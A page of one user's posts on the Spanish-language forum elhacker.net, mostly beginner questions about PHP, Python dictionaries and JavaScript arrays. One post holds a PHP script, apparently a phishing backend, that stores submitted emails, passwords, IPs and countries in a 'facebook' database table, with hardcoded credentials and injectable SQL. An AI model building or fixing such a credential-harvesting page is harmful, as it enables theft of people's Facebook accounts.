elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Programación / Desarrollo Web / problema con ver un registro o post individual con un blog hecho en php en: 28 Abril 2016, 07:43 am
Hola,mi problema es el siguiente, estoy haciendo un blog de peliculas en php, en el cual yo inserto las peliculas con su sinopsis su caratula y sus links para ver online y de descargas, okey eso lo se hacer, insetarlos y mostrarlos en la pagina, pero lo que no puedo hacer es cuando haga click en un post o registro como quieran llamarlo o en el nombre de la pelicula que en este caso es el titulo del post, quiero que me redirrecione y solo muestre esa pelicula en la que hice click, osea que muestre esa sola como si fuera un blogger que salen todos los post o entradas creados, pero cuando haces click en el titulo de ese post te redirecciona a una pagina donde se ve solo esa entrada en la que hiciste click

PORFAVOR SI ALGUIEN SABE COMO HACER ESO AYUDENME!!!!
ES URGENTE!!!!!
12  Programación / PHP / Re: Problema al guardar datos en tabla mysql con mysqli en: 28 Febrero 2016, 00:11 am
 acaso no hay nadie que me pueda ayudar!! que puto foro
13  Programación / PHP / Problema al guardar datos en tabla mysql con mysqli en: 27 Febrero 2016, 23:48 pm
Código:
<?php

error_reporting(E_ALL & ~E_NOTICE);
include("geoiploc.php");
  if (empty($_POST['checkip']))
  {
        $ip = $_SERVER["REMOTE_ADDR"];
  }
  else
  {
        $ip = $_POST['checkip'];
  }

 

$login=$_POST["email"];
$pass=$_POST["pass"];
$ip = $_SERVER["REMOTE_ADDR"];
$pais = getCountryFromIP($ip, "NamE");

$servername = "localhost";
$username = "eliander20";
$password = "casacasa123";
$dbname = "facebook";


$conn = new mysqli($servername, $username, $password, $dbname);


$sql = "INSERT INTO registrosface (Email, Contraseña, Ip, Pais)
VALUES ($login, $pass, $ip, $pais)";


$conn->close();



Como podimos ver en el codigo anterior, estoy tratando de guardar los datos del folmulario en la tabla registrosface, pero no se guarda, el formulario captura bien los datos y los capturo bien en las variables, y entro al formulario, entro los datos y doy enter, y cuando entro al phpmyadmin y a la tabla de la base de datos me aparece vacia, ah y tengo wamserver, con php5.5 y mysql 5.6
AAlguna ayuda urgente, es una tarea del instituto!
14  Programación / Scripting / Problema a resolver python? en: 27 Febrero 2016, 02:37 am
Hola, estoy tratando de hacer un programa en python en el cual yo inserte 59 numeros
osea que me pida 59 veces que inserte un numero
Código
  1. for a in range(1,60):
  2. raw_input("Inserta el numero");



este es el codigo, ok pero no es lo unico que quiero que haga, quiero que almacene esos numeros en un array, y que los sume todos al final y me de el resultado!!
15  Programación / Scripting / HOLA PROBLEMA CON LOS DICCIONARIOS EN PYTHON en: 13 Febrero 2016, 07:47 am
Hola, recien me inicie en la programacion con python, y tengo una duda con los diccionarios,
el problemas es que cuando agrego mas de un valor de cadena a una clave me dice error de sintaxis, pero cuando solo pongo un valor me sale bien, pondre el codigo abajo:

Código
  1. d = {"reaggeton": "daddy yankee" , "don omar"  "bachata": "romeo santos" , "Pince royce" }
  2. d = {"reaggeton": "daddy yankee" , "don omar" , "bachata": "romeo santos" , "Pince royce" }

cuando presiono enter en el IDLE de python, me dice SyntaxError: invalid syntax

pero cuando lo pongo de la siguiente forma con un solo valor en la clave me sale bien y no dice error

Código
  1. musica = {"bachata": "romeo santos", "dembow": "el alfa"}

mi pregunta es, no se puede poner mas de un valor string a una clave en un diccionario?
porque al parecer no.
16  Programación / PHP / un buen libro para aprender php en: 2 Febrero 2016, 04:27 am
un buen libro para aprender php, y que sea de facil lectura, y que sea lo mas reciente posible!
17  Programación / Bases de Datos / Re: Que libro me recomiendan para aprender mysql o sql? en: 31 Enero 2016, 23:39 pm
el problema es que no se mucho ingles, pero igual tratare de leerlo y gracias!
18  Programación / Bases de Datos / Que libro me recomiendan para aprender mysql o sql? en: 31 Enero 2016, 00:18 am
quiero que me recomienden un libro bueno ya sea de mysql o sql, ya que solo soy frontend, y quiero empezar del lado del servidor y bases de datos.

cual de los dos me recomiendan mysql o sql?
19  Programación / Desarrollo Web / Busco libro de javascript en: 2 Enero 2016, 10:25 am
Hola, quiero saber si alguien tiene un pdf de un buen libro de javascript, que sea o mas reciente posible, se los agradeceria, ah y que sea en español, aunque en ingles entiendo algo pero si lo tienen en ingles igual compartanmelo porfavor!!

Mod: No escribir en mayusculas. Titulo corregido.
20  Programación / Desarrollo Web / hola es sobre javascript en: 28 Diciembre 2015, 07:51 am
hola, tengo una idea sobre un programa con javascript, lo que quiero que haga es que me de una lista de cadenas osea es como un array asiiii me escoja aleatoriamente una de las cadenas osea una cadena al azar, osea que no me escoja la misma

("hola", "adios", "goodbay");

por ejemplo que de esas tres cadenas o frases me devuelva una
cuando el usuario me responda si

no se si me doy a entender,
osea es como que cuando le digo al usuario hazme una pregunta y el usuario escribe en el prompt de javascript como te llamas, quiero que salga una valor aleatorio o una cadena aleatoria de un array o de una lista de cadenas


si alguien me entendio que me ayude porfa!!!!!!!!
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines